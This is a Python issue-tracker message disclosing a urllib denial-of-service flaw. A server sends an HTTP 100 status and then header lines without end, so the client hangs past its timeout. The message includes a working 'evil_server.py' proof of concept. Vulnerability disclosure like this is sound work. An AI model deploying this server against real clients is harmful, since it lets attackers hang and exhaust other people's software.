Message 392825 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	leveryd
Recipients	leveryd
Date	2021-05-03.17:13:03
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1620061983.98.0.377096987447.issue44022@roundup.psfhosted.org>
In-reply-to

Content
if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set "timeout" argument. maybe this client also will consume more and more memory. i does not test on this conclusion. client.py ``` import urllib.request req = urllib.request.Request('http://127.0.0.1:8085') response = urllib.request.urlopen(req, timeout=1) ``` evil_server.py ``` # coding:utf-8 from socket import * from multiprocessing import * from time import sleep def dealWithClient(newSocket,destAddr): recvData = newSocket.recv(1024) newSocket.send(b"""HTTP/1.1 100 OK\n""") while True: # recvData = newSocket.recv(1024) newSocket.send(b"""x:a\n""") if len(recvData)>0: # print('recv[%s]:%s'%(str(destAddr), recvData)) pass else: print('[%s]close'%str(destAddr)) sleep(10) print('over') break # newSocket.close() def main(): serSocket = socket(AF_INET, SOCK_STREAM) serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR , 1) localAddr = ('', 8085) serSocket.bind(localAddr) serSocket.listen(5) try: while True: newSocket,destAddr = serSocket.accept() client = Process(target=dealWithClient, args=(newSocket,destAddr)) client.start() newSocket.close() finally: serSocket.close() if __name__ == '__main__': main() ```

if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set "timeout" argument.

maybe this client also will consume more and more memory. i does not test on this conclusion.

client.py
```
import urllib.request

req = urllib.request.Request('http://127.0.0.1:8085')
response = urllib.request.urlopen(req, timeout=1)
```

evil_server.py
```
# coding:utf-8
from socket import *
from multiprocessing import *
from time import sleep

def dealWithClient(newSocket,destAddr):
    recvData = newSocket.recv(1024)
    newSocket.send(b"""HTTP/1.1 100 OK\n""")

    while True:
        # recvData = newSocket.recv(1024)
        newSocket.send(b"""x:a\n""")

        if len(recvData)>0:
            # print('recv[%s]:%s'%(str(destAddr), recvData))
            pass
        else:
            print('[%s]close'%str(destAddr))
            sleep(10)
            print('over')
            break

    # newSocket.close()


def main():

    serSocket = socket(AF_INET, SOCK_STREAM)
    serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR  , 1)
    localAddr = ('', 8085)
    serSocket.bind(localAddr)
    serSocket.listen(5)

    try:
        while True:
            newSocket,destAddr = serSocket.accept()

            client = Process(target=dealWithClient, args=(newSocket,destAddr))
            client.start()

            newSocket.close()
    finally:
        serSocket.close()

if __name__ == '__main__':
    main()
```

History
Date	User	Action	Args
2021-05-03 17:13:04	leveryd	set	recipients: + leveryd
2021-05-03 17:13:03	leveryd	set	messageid: <1620061983.98.0.377096987447.issue44022@roundup.psfhosted.org>
2021-05-03 17:13:03	leveryd	link	issue44022 messages
2021-05-03 17:13:03	leveryd	create